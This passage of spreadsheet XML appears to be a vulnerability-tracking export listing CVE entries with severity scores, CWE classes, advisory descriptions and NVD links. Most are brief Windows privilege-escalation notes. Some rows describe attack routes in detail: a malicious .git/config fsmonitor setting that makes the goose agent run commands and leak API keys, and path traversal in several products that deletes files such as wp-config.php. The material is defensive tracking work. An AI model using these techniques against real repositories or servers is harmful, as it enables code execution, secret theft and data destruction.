          <t>goose is general-purpose AI agent that runs on your machine. Prior to 1.44.0, the `goose review` command runs the system `git` executable to gather the diff for review without stripping attacker-controlled Git configuration. A malicious repository whose `.git/config` sets [`core] fsmonitor = &lt;command&gt;` causes Git to execute that command on the host during the index refresh performed by `git diff HEAD`. The command runs before goose contacts a model and without a submitted prompt, model call, tool approval, or trust prompt. The context-gathering Git process is not sandboxed and is outside goose's tool-permission model. Arbitrary commands run with the privileges and environment of the user running goose, allowing file access or modification and exfiltration of environment secrets and provider API keys. The vulnerable Git invocations are built by git_command() in crates/goose-cli/src/commands/review/handler.rs and are used by touched_files() and collect_diff() for `git diff --name-only HEAD` and `git diff HEAD`. This issue is fixed in version 1.44.0.</t>
        </is>
      </c>
      <c r="M3490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72718</t>
        </is>
      </c>
    </row>
    <row r="3491">
      <c r="A3491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72926</t>
        </is>
      </c>
      <c r="C3491" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3491" s="5" t="inlineStr"/>
      <c r="F3491" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3491" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3491" s="5" t="inlineStr"/>
      <c r="I3491" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3491" s="5" t="inlineStr"/>
      <c r="K3491" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3491" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Internet Connection Sharing (ICS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72926</t>
        </is>
      </c>
    </row>
    <row r="3492">
      <c r="A3492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72930</t>
        </is>
      </c>
      <c r="C3492" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3492" s="5" t="inlineStr"/>
      <c r="F3492" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3492" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3492" s="5" t="inlineStr"/>
      <c r="I3492" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3492" s="5" t="inlineStr"/>
      <c r="K3492" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3492" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M3492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72930</t>
        </is>
      </c>
    </row>
    <row r="3493">
      <c r="A3493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72952</t>
        </is>
      </c>
      <c r="C3493" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3493" s="5" t="inlineStr"/>
      <c r="F3493" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3493" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3493" s="5" t="inlineStr"/>
      <c r="I3493" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3493" s="5" t="inlineStr"/>
      <c r="K3493" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3493" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M3493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72952</t>
        </is>
      </c>
    </row>
    <row r="3494">
      <c r="A3494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72963</t>
        </is>
      </c>
      <c r="C3494" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3494" s="5" t="inlineStr"/>
      <c r="F3494" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3494" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3494" s="5" t="inlineStr"/>
      <c r="I3494" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3494" s="5" t="inlineStr"/>
      <c r="K3494" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3494" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Execution Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72963</t>
        </is>
      </c>
    </row>
    <row r="3495">
      <c r="A3495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73003</t>
        </is>
      </c>
      <c r="C3495" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3495" s="5" t="inlineStr"/>
      <c r="F3495" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3495" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3495" s="5" t="inlineStr"/>
      <c r="I3495" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3495" s="5" t="inlineStr"/>
      <c r="K3495" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3495" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73003</t>
        </is>
      </c>
    </row>
    <row r="3496">
      <c r="A3496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73005</t>
        </is>
      </c>
      <c r="C3496" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3496" s="5" t="inlineStr"/>
      <c r="F3496" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3496" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3496" s="5" t="inlineStr"/>
      <c r="I3496" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3496" s="5" t="inlineStr"/>
      <c r="K3496" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3496" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73005</t>
        </is>
      </c>
    </row>
    <row r="3497">
      <c r="A3497" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73022</t>
        </is>
      </c>
      <c r="C3497" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3497" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3497" s="5" t="inlineStr"/>
      <c r="F3497" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3497" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3497" s="5" t="inlineStr"/>
      <c r="I3497" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3497" s="5" t="inlineStr"/>
      <c r="K3497" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3497" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t>
        </is>
      </c>
    </row>
    <row r="3498">
      <c r="A3498" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73033</t>
        </is>
      </c>
      <c r="C3498" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3498" s="5" t="inlineStr"/>
      <c r="F3498" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3498" s="5" t="inlineStr"/>
      <c r="H3498" s="5" t="inlineStr"/>
      <c r="I3498" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3498" s="5" t="inlineStr"/>
      <c r="K3498" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3498" s="5" t="inlineStr">
        <is>
          <t>Sucuri Security WordPress plugin through version 2.7.3 contains a path traversal vulnerability in the pageIntegritySubmission() method in src/integrity.lib.php that allows authenticated administrators to delete arbitrary files by supplying directory traversal sequences in the sucuriscan_integrity parameter. Attackers can manipulate the unsanitized file path concatenated with ABSPATH to traverse outside the WordPress installation directory and invoke unlink() on sensitive files such as wp-config.php and .htaccess, causing site outage or enabling malicious reinstallation.</t>
        </is>
      </c>
      <c r="M3498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73033</t>
        </is>
      </c>
    </row>
    <row r="3499">
      <c r="A3499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74038</t>
        </is>
      </c>
      <c r="C3499" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3499" s="5" t="inlineStr"/>
      <c r="F3499" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3499" s="5" t="inlineStr"/>
      <c r="H3499" s="5" t="inlineStr"/>
      <c r="I3499" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3499" s="5" t="inlineStr"/>
      <c r="K3499" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3499" s="5" t="inlineStr">
        <is>
          <t>Wazuh 4.0.0 before 4.14.6 contains a path traversal vulnerability that allows unauthenticated remote attackers to cause denial of service by enrolling an agent with a dot-sequence name such as ".." through the enrollment port. Attackers exploit insufficient validation in OS_IsValidName() and unsafe path concatenation in delete_diff() to resolve the traversal to the parent queue directory, causing its subdirectories to be removed and stopping all Wazuh services requiring manual recovery.</t>
        </is>
      </c>
      <c r="M3499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74038</t>
        </is>
      </c>
    </row>
    <row r="3500">
      <c r="A3500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74044</t>
        </is>
      </c>
      <c r="C3500" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3500" s="5" t="inlineStr"/>
      <c r="F3500" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3500" s="5" t="inlineStr"/>
      <c r="H3500" s="5" t="inlineStr"/>
      <c r="I3500" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3500" s="5" t="inlineStr"/>
      <c r="K3500" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3500" s="5" t="inlineStr">
        <is>
          <t>Wazuh 4.0.0 before 4.14.6 contains a path traversal vulnerability that allows authenticated cluster peers to delete arbitrary directory contents by supplying a traversal-shaped node name in the cluster hello payload without validation. Attackers holding a valid cluster Fernet key can craft a malicious node name and disconnect, triggering the master's peer cleanup routine to remove the contents of arbitrary directories within the Wazuh installation path writable by the wazuh user.</t>
        </is>
      </c>
      <c r="M3500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74044</t>
        </is>
      </c>
    </row>
    <row r="3501">
      <c r="A3501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74236</t>
        </is>
      </c>
      <c r="C3501" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3501" s="5" t="inlineStr"/>
      <c r="F3501" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3501" s="5" t="inlineStr"/>
      <c r="H3501" s="5" t="inlineStr"/>
      <c r="I3501" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3501" s="5" t="inlineStr"/>
      <c r="K3501" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3501" s="5" t="inlineStr">
        <is>
          <t>GFI Exinda AI and ClearView before 7.6.5 contains a path traversal vulnerability in the diagnostic file deletion handler. The unlink_or_email_file() function accepts parameters prefixed with v_file_row_ and appends their values directly to a base directory path without sanitizing for directory traversal sequences. An authenticated attacker with Admin privileges can delete arbitrary files from the system in the context of root.</t>
        </is>
      </c>
      <c r="M3501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74236</t>
        </is>
      </c>
    </row>
    <row r="3502">
      <c r="A3502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74796</t>
        </is>
      </c>
      <c r="C3502" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3502" s="5" t="inlineStr"/>
      <c r="F3502" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3502" s="5" t="inlineStr"/>
      <c r="H3502" s="5" t="inlineStr"/>
      <c r="I3502" s="5" t="inlineStr">
        <is>
          <t>2026-08-16</t>
        </is>
      </c>
      <c r="J3502" s="5" t="inlineStr"/>
      <c r="K3502" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3502" s="5" t="inlineStr">
        <is>
          <t>OpenTofu before 1.11.7 fails to validate existing symlinks in the provider cache directory during initialization. Attackers can place a malicious symlink in a trusted working directory to cause tofu init to write provider package contents to arbitrary filesystem locations outside the working tree.</t>
        </is>
      </c>
      <c r="M3502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74796</t>
        </is>
      </c>
    </row>
    <row r="3503">
      <c r="A3503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77485</t>
        </is>
      </c>
      <c r="C3503" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3503" s="5" t="inlineStr"/>
      <c r="F3503" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3503" s="5" t="inlineStr"/>
      <c r="H3503" s="5" t="inlineStr"/>
      <c r="I3503" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3503" s="5" t="inlineStr"/>
      <c r="K3503" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3503" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77485</t>
        </is>
      </c>
    </row>
    <row r="3504">
      <c r="A3504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77894</t>
        </is>
      </c>
      <c r="C3504" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3504" s="5" t="inlineStr"/>
      <c r="F3504" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3504" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3504" s="5" t="inlineStr"/>
      <c r="I3504" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3504" s="5" t="inlineStr"/>
      <c r="K3504" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3504" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t>
        </is>
      </c>
    </row>
    <row r="3505">
      <c r="A3505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77897</t>
        </is>
      </c>
      <c r="C3505" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3505" s="5" t="inlineStr"/>
      <c r="F3505" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3505" s="5" t="inlineStr"/>
      <c r="H3505" s="5" t="inlineStr"/>
      <c r="I3505" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3505" s="5" t="inlineStr"/>
      <c r="K3505" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L3505" s="5" t="inlineStr">
        <is>
          <t>Relative path traversal in Power Automate allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77897</t>
        </is>
      </c>
    </row>
    <row r="3506">
      <c r="A3506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77899</t>
        </is>
      </c>
      <c r="C3506" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3506" s="5" t="inlineStr"/>
      <c r="F3506" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3506" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3506" s="5" t="inlineStr"/>
      <c r="I3506" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3506" s="5" t="inlineStr"/>
      <c r="K3506" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3506" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t>
        </is>
      </c>
    </row>
    <row r="3507">
      <c r="A3507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77905</t>
        </is>
      </c>
      <c r="C3507" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3507" s="5" t="inlineStr"/>
      <c r="F3507" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3507" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3507" s="5" t="inlineStr"/>
      <c r="I3507" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3507" s="5" t="inlineStr"/>
      <c r="K3507" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3507" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t>
        </is>
      </c>
    </row>
    <row r="3508">
      <c r="A3508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78457</t>
        </is>
      </c>
      <c r="C3508" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3508" s="5" t="inlineStr"/>
      <c r="F3508" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3508" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3508" s="5" t="inlineStr"/>
      <c r="I3508" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3508" s="5" t="inlineStr"/>
      <c r="K3508" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3508" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t>
        </is>
      </c>
    </row>
    <row r="3509">
      <c r="A3509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78464</t>
        </is>
      </c>
      <c r="C3509" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3509" s="5" t="inlineStr"/>
      <c r="F3509" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3509" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3509" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="I3509" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3509" s="5" t="inlineStr"/>
      <c r="K3509" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L3509" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M3509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78464</t>
        </is>
      </c>
    </row>
    <row r="3510">
      <c r="A3510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79636</t>
        </is>
      </c>
      <c r="C3510" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3510" s="5" t="inlineStr"/>
      <c r="F3510" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3510" s="5" t="inlineStr"/>
      <c r="H3510" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I3510" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3510" s="5" t="inlineStr"/>
      <c r="K3510" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="L3510"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unauthorized access.</t>
        </is>
      </c>
      <c r="M3510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79636</t>
        </is>
      </c>
    </row>
    <row r="3511">
      <c r="A3511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80093</t>
        </is>
      </c>
      <c r="C3511" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3511" s="5" t="inlineStr"/>
      <c r="F3511" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3511" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H351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3511" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3511" s="5" t="inlineStr"/>
      <c r="K3511" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3511" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80093</t>
        </is>
      </c>
    </row>
    <row r="3512">
      <c r="A3512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81192</t>
        </is>
      </c>
      <c r="C3512" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3512" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3512" s="5" t="inlineStr"/>
      <c r="F3512" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3512" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3512" s="5" t="inlineStr"/>
      <c r="I3512" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3512" s="5" t="inlineStr"/>
      <c r="K3512" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L3512" s="5" t="inlineStr">
        <is>
          <t>`OpenTelemetry.Resources.Host` NuGet package, which provides OpenTelemetry resource detectors for host, is affected by an untrusted search path vulnerability on macOS. Prior to version 1.16.0-beta.2,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This vulnerability only affect macOS hosts - Linux and Windows hosts are unaffected. Version 1.16.0-beta.2 contains a patch. No known workarounds are available.</t>
        </is>
      </c>
      <c r="M3512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81192</t>
        </is>
      </c>
    </row>
    <row r="3513">
      <c r="A3513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81389</t>
        </is>
      </c>
      <c r="C3513" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3513" s="5" t="inlineStr"/>
      <c r="F3513" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3513" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3513" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I3513" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3513" s="5" t="inlineStr"/>
      <c r="K3513" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3513" s="5" t="inlineStr">
        <is>
